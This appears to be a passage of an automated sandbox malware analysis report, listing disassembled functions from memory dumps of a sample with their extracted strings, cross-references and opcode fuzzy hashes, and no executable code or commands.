Opcode Fuzzy Hash: 4e94701e1e99e6707c0b9fd9b3987e9c1f38ec82cd3e3195452473f1eeb70101
Instruction Fuzzy Hash: 30E1E1B19087849FE324CF15C441BABBBE4BF88314F008A2EE59DAB391D7719909CF56

Function 00C726E0 Relevance: 2.8, Strings: 2, Instructions: 263COMMON

Download Yara Rule

Strings

., xrefs: 00C72711
6, xrefs: 00C726FF

Memory Dump Source

Source File: 00000000.00000002.1907228716.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.1907217407.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_alWUxZvrvU.jbxd

Yara matches

Similarity

API ID:
String ID: .$6
API String ID: 0-4089497287
Opcode ID: 608b082da8f117b8010ef755b9eda669287b8c79211bf5da9ce38cdaee95cc3d
Instruction ID: 6c8ae20f97983992302cc37381588dd491510e4710796342f771ba2fa5deb78c
Opcode Fuzzy Hash: 608b082da8f117b8010ef755b9eda669287b8c79211bf5da9ce38cdaee95cc3d
Instruction Fuzzy Hash: 9481E172F001098BDF2C895DC9502B9B3A2EBE4315F28C17AD95DDB7C0EA36DE519B81

Function 00C72C30 Relevance: 2.7, Strings: 2, Instructions: 190COMMON

Download Yara Rule

Strings

gfff, xrefs: 00C72CB9
VUUU, xrefs: 00C72E61

Memory Dump Source

Source File: 00000000.00000002.1907228716.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.1907217407.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_alWUxZvrvU.jbxd

Yara matches

Similarity

API ID:
String ID: VUUU$gfff
API String ID: 0-2662692612
Opcode ID: 72bf324069c308be98865e891f2e93cdb0937546fb6a1298499cee73015a307c
Instruction ID: fc547152aa5e4a97fda5423e6d7e7e226b3fba39383a3402e443143afed6efd7
Opcode Fuzzy Hash: 72bf324069c308be98865e891f2e93cdb0937546fb6a1298499cee73015a307c
Instruction Fuzzy Hash: 77516D32B005494BDB2C8A6DCC903DDB6A6EBE4300F19C27ADD5DCF391E5749E058791

Function 00F1E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

Legacy, xrefs: 00F1E75A
UEFI, xrefs: 00F1E751

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 9b3ada2ba00df564677aabeab884c273a4d96b9840ff96db82629ad69fd01d19
Instruction ID: 7c05e7ade9224b34df42abe6e6045a3999c06ed1898754eabf9ce3f0f67f8d5b
Opcode Fuzzy Hash: 9b3ada2ba00df564677aabeab884c273a4d96b9840ff96db82629ad69fd01d19
Instruction Fuzzy Hash: CC614E72E003189FDB14DFA8C841BADBBF9FB48710F24406DE959EB291D731A980EB50

Function 00F443D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

@, xrefs: 00F44437
MUI, xrefs: 00F44525

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: @$MUI
API String ID: 0-17815947
Opcode ID: c299d73c505290e1706cf7e1d2105d21ce51cfbbd594bc98981ae37e2b8d764c
Instruction ID: e1198dda19c2f256f07b904bae6bb9c6a9bbb9e2e7cebf26c6aae76e5f6fd2ff
Opcode Fuzzy Hash: c299d73c505290e1706cf7e1d2105d21ce51cfbbd594bc98981ae37e2b8d764c
Instruction Fuzzy Hash: F45147B1E0021DAFDF11DFA5CC81BEEBBBCAB08754F140129E905B7291D670AE05DBA0

Function 00EA04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 00EA063D
kLsE, xrefs: 00EA0540

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: a109172e382c38cd723635a1055d2145df7282b7b861ee7b00b26259cbb42b39
Instruction ID: a9176e6396056f2beb028fdf2bd650ef4df32aadceadbbf8c64c8cf0368a2aaf
Opcode Fuzzy Hash: a109172e382c38cd723635a1055d2145df7282b7b861ee7b00b26259cbb42b39
Instruction Fuzzy Hash: 31519E719047468FC724EF64C5406A7B7E4AF8A308F00A83EE5DAAB641E770F945CF92

Function 00C730E0 Relevance: 2.6, Strings: 2, Instructions: 101COMMON

Download Yara Rule

Strings

P, xrefs: 00C730F7
7, xrefs: 00C73102

Memory Dump Source

Source File: 00000000.00000002.1907228716.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.1907217407.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_alWUxZvrvU.jbxd

Yara matches

Similarity

API ID:
String ID: 7$P
API String ID: 0-1155963477
Opcode ID: d53a5b9e3ce5af3ef0c1d4d56b348f476e656560eab1914f182360847543f010
Instruction ID: 9bbc7b838795b2f367f4358514ff9403a2194655c4a11531c00d472474c19c49
Opcode Fuzzy Hash: d53a5b9e3ce5af3ef0c1d4d56b348f476e656560eab1914f182360847543f010
Instruction Fuzzy Hash: 3331C7727006148FD71CCF58D994A6ABB92AF88314B5BC2ADD91E4F392CA74DD02CBC0

Function 00EDA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Cleanup Group, xrefs: 00EDA5E4
Threadpool!, xrefs: 00EDA5E9

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: 67b40ce2ffe1fd70244c6d90e0f49ebed33f7e697eca33669ee315ee860f6dd0
Instruction ID: d2d79e0d765b909956d75b4f5ce22e57e16b1bbf289c65d01d27980fe8feaf47
Opcode Fuzzy Hash: 67b40ce2ffe1fd70244c6d90e0f49ebed33f7e697eca33669ee315ee860f6dd0
Instruction Fuzzy Hash: 8F01D1B2244744EFE311DF14CD46B2677E8E784715F08893AB66CDB290E3B4D905DB46

Function 00EF2F28 Relevance: 2.0, Strings: 1, Instructions: 762COMMON

Download Yara Rule

Strings

P`vRbv, xrefs: 00EF300D, 00EF33E4, 00EF343B, 00EF34FE, 00EF352E

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: P`vRbv
API String ID: 0-2392986850
Opcode ID: 0741060ad1848ff8fa2138666e00cfd9c44494e16ccce4c351997183429baa08
Instruction ID: d87a5e7a5ed0a29958e8606c5c6896be4d4e40c4217d522c7fc669751ded5b50
Opcode Fuzzy Hash: 0741060ad1848ff8fa2138666e00cfd9c44494e16ccce4c351997183429baa08
Instruction Fuzzy Hash: AA42F271D0525EAADF28DFB8D8446FDBBB1AF04318F24A01AE651BB290DB348F81D750

Function 00F4CD1F Relevance: 1.9, Strings: 1, Instructions: 620COMMON

Download Yara Rule

Strings

@, xrefs: 00F4CDAC

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: a62076708d3ed8f09253c3cd3ba277d89f510b56d554c4357fdc89bf54a91837
Instruction ID: 67d9a3254af9ced26ffe42a5cddc2c330e2a2e9ad95853d6f050fb7c499b6ac9
Opcode Fuzzy Hash: a62076708d3ed8f09253c3cd3ba277d89f510b56d554c4357fdc89bf54a91837
Instruction Fuzzy Hash: EC621870D012188FCB98DF9AC4D4AADB7B2FF8C311F61819AE9816B745C7356A16CF60

Function 00EC2E90 Relevance: 1.7, Strings: 1, Instructions: 438COMMON

Download Yara Rule

Strings

0, xrefs: 00EC3240

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 25c99c6a374a1c0157deb90a2e958d7295e5d7b6bd7f96e730dd96e4faf55a4d
Instruction ID: 0c1b91f12a39cd12a708c56bf05a5a8a3be93b7b1b2ac2a411823ba5e01683c8
Opcode Fuzzy Hash: 25c99c6a374a1c0157deb90a2e958d7295e5d7b6bd7f96e730dd96e4faf55a4d
Instruction Fuzzy Hash: E3F1A171608745CFCB25CF24C680F6AB7E1AF88714F14982DF899A7281DB32DE46DB52

Function 00C8670F Relevance: 1.7, Strings: 1, Instructions: 424COMMON

Download Yara Rule

Strings

(, xrefs: 00C86A2F

Memory Dump Source

Source File: 00000000.00000002.1907228716.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.1907217407.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_alWUxZvrvU.jbxd

Yara matches

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: df94c476574dbe7f149fd435816bc0cf78198d2b3f2f8e9d14fbb94706aa6a16
Instruction ID: f91c5f5112579a0e39a505c82256bf382273c1027e18cc1c7caf6e05cacc607a
Opcode Fuzzy Hash: df94c476574dbe7f149fd435816bc0cf78198d2b3f2f8e9d14fbb94706aa6a16
Instruction Fuzzy Hash: 25021DB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7315D6746A418F80

Function 00C86713 Relevance: 1.7, Strings: 1, Instructions: 423COMMON

Download Yara Rule

Strings

(, xrefs: 00C86A2F

Memory Dump Source

Source File: 00000000.00000002.1907228716.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.1907217407.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_alWUxZvrvU.jbxd

Yara matches

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
Instruction ID: 5d50d780d71f96f38b1cce77e9153187a063623b312efe90956966740022f81b
Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
Instruction Fuzzy Hash: CC021DB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7315D6746A418F80

Function 00EA2FC8 Relevance: 1.7, Strings: 1, Instructions: 410COMMON

Download Yara Rule

Strings

PATH, xrefs: 00EA30D6, 00EA3124

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: 73f52399e0e1bacca2b4e926376b2f1bc234fa3f44d1a0e3d8cf5fd93042863e
Instruction ID: 7bd485051a0246f159e45d048d1cb4d0849cab8234d9c30970a997a8ecc2f607
Opcode Fuzzy Hash: 73f52399e0e1bacca2b4e926376b2f1bc234fa3f44d1a0e3d8cf5fd93042863e
Instruction Fuzzy Hash: BAF19A71E002189BCB25CFA9D881ABEBBF1FF89704F55502AF854BB251D730AE41DB60

Function 00F2EFA0 Relevance: 1.6, APIs: 1, Instructions: 121COMMON

Download Yara Rule

APIs

__aullrem.LIBCMT ref: 00F2F05B

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID: __aullrem
String ID:
API String ID: 3758378126-0
Opcode ID: d2399a191eb0f5f701a36fcf9f691f845dfe918fa796f31438aa4cbd81ac600a
Instruction ID: cf8ce9fbe15d1eff3640ef81441aff9fcdf2a85767c3e6ecbbcf659021eae122
Opcode Fuzzy Hash: d2399a191eb0f5f701a36fcf9f691f845dfe918fa796f31438aa4cbd81ac600a
Instruction Fuzzy Hash: DF419371F101299BCF18DFB9C8815AEF7F2FF88320B288239D615E7281D6349D549790

Function 00F51AA3 Relevance: 1.6, Strings: 1, Instructions: 370COMMON

Download Yara Rule

Strings

., xrefs: 00F51C01

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 95c0eeaa11081781f2a18c47493136120b8d86bb09e20e0479e989b319b6bab6
Instruction ID: 1af45cfc3fd67cfbfd39eaa1f8c0d698ad4af05688dca50ca87890e4dbf38306
Opcode Fuzzy Hash: 95c0eeaa11081781f2a18c47493136120b8d86bb09e20e0479e989b319b6bab6
Instruction Fuzzy Hash: 30E19975D002689BCF20CFA9C481BBDB7B1FF44711F64811AED85AB290D774AC8AEB50

Function 00EA0100 Relevance: 1.6, Strings: 1, Instructions: 321COMMON

Download Yara Rule

Strings

, xrefs: 00EA0255

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 73c06c45c6346c3d9ed1818b0b11a5dc59c1c4955c3c6647dca8cf24defa6796
Instruction ID: ddbd878053f471ff8dd833d9264e4bb743be078c9e01c4a0a7c17ff32ec9170f
Opcode Fuzzy Hash: 73c06c45c6346c3d9ed1818b0b11a5dc59c1c4955c3c6647dca8cf24defa6796
Instruction Fuzzy Hash: 7BA13830A0436C6BDF38CE648845BFE67E59B5E318F046099FE46BF292D674BD448B60

Function 00F54420 Relevance: 1.6, Strings: 1, Instructions: 307COMMON

Download Yara Rule

Strings

, xrefs: 00F54606

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 80ddb9020437b9236543fb65244b3436ac23cc5b6592b0459fb19629362b2f15
Instruction ID: ffc7e7abc734a67eba2ab50a72a32734025fbb1020ccce10bcd70213ab43f88e
Opcode Fuzzy Hash: 80ddb9020437b9236543fb65244b3436ac23cc5b6592b0459fb19629362b2f15
Instruction Fuzzy Hash: 72A10935A003686ADF34CA64CC45BF977A49F4A72EF084498BF45AB281D774EDCCEA50

Function 00F26420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 00F265C1

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: a61f0d2b341f1b4b439d3e1c956f55ffa606f58ac45cc6ce99a85626c1f34f85
Instruction ID: 983710969030471dd2fd3a03ff947427318fedcd16ad0050ae48a69dfbecb154
Opcode Fuzzy Hash: a61f0d2b341f1b4b439d3e1c956f55ffa606f58ac45cc6ce99a85626c1f34f85
Instruction Fuzzy Hash: 1F915272940229AFDB21DF95DD86FAEBBB8EF04B50F144069F600FB191D675AD00DBA0

Function 00F4E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

, xrefs: 00F4E1FA

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 6274840da0ec8f2f0fea94eb0ca9481a20b99141c5d8fa776b5b94adc591c696
Instruction ID: bdff5c3a53f655904292d983a5a8c149b0b83d7e55b25216cf840a2a56b3ac54
Opcode Fuzzy Hash: 6274840da0ec8f2f0fea94eb0ca9481a20b99141c5d8fa776b5b94adc591c696
Instruction Fuzzy Hash: EA919E72900648BADB22AFA1DD45FAFBFB9FF85750F100029F901A7251DB749A01EB90

Function 00C723B0 Relevance: 1.5, Strings: 1, Instructions: 217COMMON

Download Yara Rule

Strings

sHM, xrefs: 00C72480

Memory Dump Source

Source File: 00000000.00000002.1907228716.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.1907217407.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_alWUxZvrvU.jbxd

Yara matches

Similarity

API ID:
String ID: sHM
API String ID: 0-1294282591
Opcode ID: b2f489f921812413065e81ea6037d17f4095104862f78e25148d020c8105392f
Instruction ID: 995cad987e1f66a9516ab3dcb431d393da53e1a5186eb8b8e6ac1b038b3da378
Opcode Fuzzy Hash: b2f489f921812413065e81ea6037d17f4095104862f78e25148d020c8105392f
Instruction Fuzzy Hash: 3361B572B0010547CB5CCE1DDCA16A9B3A6EBE4315B58C17AED2EDF791EA34EE118780

Function 00EDA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 00F167C9

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: 8952fd0306107eac7d3164853cb8c0736cea26b871259c8df17e630a2c766517
Instruction ID: 1bfd9c75455a88a447c9bd3c30650afabd6669cc570530af28e4b2435dc77c05
Opcode Fuzzy Hash: 8952fd0306107eac7d3164853cb8c0736cea26b871259c8df17e630a2c766517
Instruction Fuzzy Hash: 30714C75E0021A9FDF28CF98D5916EDBBB1BF48724F24812EE805E7281DB359D81EB50

Function 00F44978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

.mui, xrefs: 00F44A7F

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: .mui
API String ID: 0-1199573805
Opcode ID: 00278401ed2d72dbc037307d8550fdf1b525f85dd733c85661044cb5b098ab1e
Instruction ID: 44ddde2f68600c2a072c4ba0d7f3dbe44588f4fac0caf5c044e05442c98e25be
Opcode Fuzzy Hash: 00278401ed2d72dbc037307d8550fdf1b525f85dd733c85661044cb5b098ab1e
Instruction Fuzzy Hash: 2C519172D002299BDF10DF98C841BAEBBB4EF48714F05412AED15BB251D778AD01DFA4

Function 00EBE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 00EBE6A4

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: cb95a7f19ddbfbf1d2037193e25371bf5c1fef6f922e13466fb151f6cac33261
Instruction ID: 668a426827d4c78ad766f70e47d7b02bcd90c438f508cce797ab69334017b51b
Opcode Fuzzy Hash: cb95a7f19ddbfbf1d2037193e25371bf5c1fef6f922e13466fb151f6cac33261
Instruction Fuzzy Hash: 8041A172508311ABD721DA75C841BEBB7E8AF88718F441A2EF584F7281EA74DD04C793

Function 00F1C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 00F1C77F

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: c991b98686c3e0a8542f66fcb948929adb5e4d2c2db13be7e65c7db376d6d8f8
Instruction ID: e087f9e462d5596d42e02f5a562044036637dc0cb742c5d2dfdf283601270d25
Opcode Fuzzy Hash: c991b98686c3e0a8542f66fcb948929adb5e4d2c2db13be7e65c7db376d6d8f8
Instruction Fuzzy Hash: 194124B1D4052CABDB21DB50CC85FDEB7BCAB44724F0045A5E608B7181DB709E899FE4

Function 00F36B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

#, xrefs: 00F36B91

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: c5ffc87452ad1d1b97b8a6731eff71d4ff6be7a3d3c35d5c7f2eb02423e7add7
Instruction ID: 3376a24fcb0f48c64518e608dada2ac2b93298a5e4eaa5627e009fb91d8e4486
Opcode Fuzzy Hash: c5ffc87452ad1d1b97b8a6731eff71d4ff6be7a3d3c35d5c7f2eb02423e7add7
Instruction Fuzzy Hash: 9D312631A00758ABDB22CB69C850FEEB7B8DF44765F108029E980EB282CB75ED05DB50

Function 00EA4260 Relevance: 1.4, Strings: 1, Instructions: 102COMMON

Download Yara Rule

Strings

%, xrefs: 00EA42EA

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: %
API String ID: 0-2291192146
Opcode ID: 29cac93b41e524603a464c26c378044cd4d98356a26fa10f155c5eebcb3b80ba
Instruction ID: 5ea799dd4381308885f725c8fdca5b4270dc06b3baaf44323a57c3dddf1fb765
Opcode Fuzzy Hash: 29cac93b41e524603a464c26c378044cd4d98356a26fa10f155c5eebcb3b80ba
Instruction Fuzzy Hash: F341AD71500B45DFC722CF28C885BD6B7E9BF89314F108469E5599B291CBB4F844EB90

Function 00F1CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

BinaryName, xrefs: 00F1CAA2

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 3d34f14cbc690563f9d41e7648f7557ce3d2bba4eb38fc471e479f678b3438d2
Instruction ID: 3596d255b2a3830e6da222de3c106bcb5e6de2b17f14fb14d74da1132c39a5da
Opcode Fuzzy Hash: 3d34f14cbc690563f9d41e7648f7557ce3d2bba4eb38fc471e479f678b3438d2
Instruction Fuzzy Hash: A2312236E44519AFEB15DB59C852EAFB7B8EFC0720F114129E905E7290D730AE40EBE0

Function 00EA4690 Relevance: 1.3, Strings: 1, Instructions: 57COMMON

Download Yara Rule

Strings

P , xrefs: 00EA46ED

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: P
API String ID: 0-707820851
Opcode ID: 3fa731355124944b6b78aeceaf5b62b4ece24e879a1b8614395c6f4a51a6508f
Instruction ID: 53a8fb37d019de903ce4f1dea31a3ca6b47a1509beedb615e3d4446217095fc0
Opcode Fuzzy Hash: 3fa731355124944b6b78aeceaf5b62b4ece24e879a1b8614395c6f4a51a6508f
Instruction Fuzzy Hash: FC119EB6200794AFDB25CF59D841B5677A4EBCA768F15511AF804AF2A0C3B0FC40CF60

Function 00F2892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 00F2895E

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
API String ID: 0-702105204
Opcode ID: 157bcf42a30d453d8b6a551d87cbccf18d21c86a0a9acc0ae6dac19ccf56ae8a
Instruction ID: d2431aa2d71a6492f25a2a187df590324213c62e94d589d6f218831c2de60014
Opcode Fuzzy Hash: 157bcf42a30d453d8b6a551d87cbccf18d21c86a0a9acc0ae6dac19ccf56ae8a
Instruction Fuzzy Hash: 070147322016319FEA256F55AC85B3637A0EFC5FE0F041028F1411A5A2CF60BCC2F792

Function 00EA47FB Relevance: 1.3, Strings: 1, Instructions: 33COMMON

Download Yara Rule

Strings

P , xrefs: 00EA4819

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: P
API String ID: 0-707820851
Opcode ID: 1861bd68fe1d7f99c11c1d84471cb5b2c4d09600f45dd479d23f31695eab2be1
Instruction ID: 528d49ce61f10bf6a0f54ac657696bc667aad69e16ef358e0fc966bff04d5ae6
Opcode Fuzzy Hash: 1861bd68fe1d7f99c11c1d84471cb5b2c4d09600f45dd479d23f31695eab2be1
Instruction Fuzzy Hash: 30F024B18123E08FD739CB18E004B61B7C49B8A738F18A86AF449AF181C3ECFC80C641

Function 00EDE8F0 Relevance: 1.0, Instructions: 985COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c7d72d97faa941beb0ab0a3d64ae521faffb3eac464956b0d2745173190efa5
Instruction ID: ed3abd9471a1fae8ff0a6e2edfe9c9ffdbf3441f70cc998a3acf16ff0590ebc7
Opcode Fuzzy Hash: 8c7d72d97faa941beb0ab0a3d64ae521faffb3eac464956b0d2745173190efa5
Instruction Fuzzy Hash: 2E821272F102188BCB58CFADDC916DDB7F2EF88314B19812DE41AEB345DA34AC568B45

Function 00EE516C Relevance: .8, Instructions: 785COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b350a08453892b449b984043ee91cff97c39519a2ea51c6143a2bcfc601bf66f
Instruction ID: 4adcd7473b793f4b5850007f2427bfafee10531b54ddce3ccd4349a06bb7853b
Opcode Fuzzy Hash: b350a08453892b449b984043ee91cff97c39519a2ea51c6143a2bcfc601bf66f
Instruction Fuzzy Hash: 97628D33804A8EAFCF14CF0AD8905AEBB72BA5530CF55E65CC89A37615D371BA54CB90

Function 00F42000 Relevance: .8, Instructions: 757COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

